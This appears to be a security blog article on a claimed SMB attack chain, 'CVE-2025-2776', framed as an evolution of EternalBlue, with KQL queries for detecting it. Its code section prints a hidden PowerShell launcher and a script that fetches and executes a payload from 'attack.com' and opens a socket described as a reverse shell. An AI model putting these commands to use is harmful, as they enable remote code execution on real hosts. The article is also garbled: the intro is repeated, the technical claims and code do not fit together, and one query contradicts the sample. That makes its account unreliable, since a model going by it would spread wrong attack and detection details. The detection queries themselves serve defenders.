It shook the world in 2017 and has evolved into today’s CVE‑2025‑2776. Microsoft still relies on SMBv1, this article will explain how attackers have tweaked the chain from a simple DLL to a full reverse‑shell stack, and what that means for the defenders.# From-EternalBlue-to-CVE-2025-2776-The-Evolution-of-an-SMB-Attack
It shook the world in 2017 and has evolved into today’s CVE‑2025‑2776. Microsoft still relies on SMBv1, this article will explain how attackers have tweaked the chain from a simple DLL to a full reverse‑shell stack, and what that means for the defenders.
**A Brief Historical Lookback**
When WannaCrypter used EternalBlue in 2017, the flaw was a classic remote code execution bug that let a malicious attacker send a packet to a Windows host over SMBv1. The payload created an executable that ran a new process and opened a listening port on the same machine; from there the attacker could pivot outwards or exfiltrate data back to a remote server. EternalBlue’s code was short, but it had a few hard‑to‑track side‑effects: the SMB packet had an odd header layout, and the Windows kernel would drop the payload in memory before writing it to disk.
Fast forward to 2025, and the new CVE‑2025‑2776 takes that same idea and gives it an extra layer of complexity. Instead of just opening a port, the attacker now writes a reverse shell into the network stack itself. That means you can see a complete SMB session that originates from the Pi device in the logs, and you have a new indicator (the process name and IP address) to watch for.
**Code That Makes It Tick **
Below is the JavaScript that sits inside the PDF attachment and fires the whole chain:
var cmd = "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File C:\\Users\\Admin\\script.ps1";
WshShell.Sleep(500);
var sh = WshShell.Exec(cmd);
while (!sh.StdOut.EndOfStream) {
var line = sh.StdOut.ReadLine();
WScript.Echo(line);
}
When the script finishes, it creates a file named script.ps1 on the target host. The PowerShell script itself looks like this:
powershell
Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://attack.com/shell.exe')
$client = New-Object System.Net.Sockets.TcpClient
$client.Connect('10.0.1.5', 445)
$stream = $client.GetStream()
$payload = Get-Content -Path C:\\Users\\Admin\\script.ps1 | Out-File -Encoding binary
$stream.Write($payload, 0, $payload.Length)
**KQL Detection Strategy for CVE-2025-2776**
**Suspicious PowerShell Execution**
Detects creation of script.ps1 in user directories.
DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine has_all ("-ExecutionPolicy", "Bypass", "-NoProfile")
| where ProcessCommandLine has "script.ps1"
| project Timestamp, DeviceName, InitiatingProcessFileName, ProcessCommandLine, AccountName
**Outbound SMB Connection to Unusual IP**
Flags outbound SMB traffic to non-standard internal IPs
DeviceNetworkEvents
| where RemotePort == 445
| where RemoteIP !startswith "192.168." and RemoteIP !startswith "10."
| where InitiatingProcessFileName == "powershell.exe"
| project Timestamp, DeviceName, RemoteIP, InitiatingProcessFileName, InitiatingProcessCommandLine
**Reverse Shell Behavior via TCPClient**
Looks for PowerShell using .NET classes to initiate reverse shell behavior.
DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine has "System.Net.Sockets.TcpClient"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
Network Stream Write Activity
Advanced detection if telemetry includes .NET stream activity.
DeviceProcessEvents
| where ProcessCommandLine has "GetStream" and ProcessCommandLine has "Write"
| where ProcessCommandLine has "script.ps1"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view